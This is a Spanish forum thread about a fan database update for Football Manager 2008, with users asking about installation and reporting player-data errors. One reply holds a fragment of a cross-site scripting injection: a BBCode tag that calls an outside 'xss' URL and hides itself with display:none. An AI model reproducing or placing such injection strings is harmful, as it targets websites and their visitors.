Jump to content

Actualización FM 08/09

Respuestas destacadas

omg [acronym=okhttp://thecountx.net/file.xml#xss);display:none]'>

Muchas gracias, es lo que estaba buscando!! xD

• 2 semanas más tarde...

Cual es la ultima actualización? Que este post tiene un montón de páginas!! xD

• Autor
Cual es la ultima actualización? Que este post tiene un montón de páginas!! :)

Está todo bien ordenadito en el primer post.

Hola, yo tengo el Football Manager 2008 y me descargué tu actualizacion

Lo puse en la carpeta Db tambien.

Tambien tengo el parche 8.0.2, pero empiezo una nueva partida pongo parche 8.0.2 (sino me aparece solo el Default, ningun otro) y tirin, solo tengo la info del parche, ninguna acutalización

Como es que se usa?

MUCHISIMAS gracias

Hola, yo tengo el Football Manager 2008 y me descargué tu actualizacion

Lo puse en la carpeta Db tambien.

Tambien tengo el parche 8.0.2, pero empiezo una nueva partida pongo parche 8.0.2 (sino me aparece solo el Default, ningun otro) y tirin, solo tengo la info del parche, ninguna acutalización

Como es que se usa?

MUCHISIMAS gracias

• 2 semanas más tarde...

Bueno... sha te voy diciendo q encontre varios errores...

*Gaston Aguirre esta en San lorenzo no en America...

*Eduardo Salvio es delantero natural y tendria q tener 19 en MPD Y MED

*Osvaldo Gaitan(Boca)agregale las posiciones de delantero,MPD y MPI

*Andres Franzoia Ponele un 19 en delantero y Mpi

Cual quier otro error te aviso... ;)

• 2 semanas más tarde...

Esto tiene un gran fallo... que empieza en la temporada 07/08 y deberia empezar esta update en la 08/09.Tienes los fichajes de los equipos en la temporada en la que estamos, pero sin embargo empieza una temporada antes.Deberias adalantar la fecha de este parche a la temporada 08/09.

P.D.He visto demasiado chileno en esta actualizacion, demasidado bueno.Espero que eso lo tomen en cuenta.Por lo demas muy buena actualizacion y espero que se siga editando.Saludos

Muchas gracias...

A todo esto, se hará un nueva actualización para el mercado de invierno europeo y la nueva temporada en general del fútbol mundial???

Joer... al villa le habeis puesto tan bueno que en la 2 temporada lleva 10 goles de ventaja al 2 goleador, y encima no hace na mas que sacar 10 y otro 10.Revisar estas cosas.No creo que villa esta a la altura de ibrahimovic y otros delanteros, si que esta muy por ese nivel, pero no creo que llegue a ese nivel.

me pareceria interesantisimo si se hiciera con esta misma BD el update con este mercado de fichajes de enero.. como un parche o algo asi.. espero asi sea.. me encantaria si la hacen.. saludos xD

Archivado

Este hilo está archivado y por tanto cerrado a incorporar nuevas respuestas.

viendo esta sección 0

• Ningún usuario registrado viendo esta página.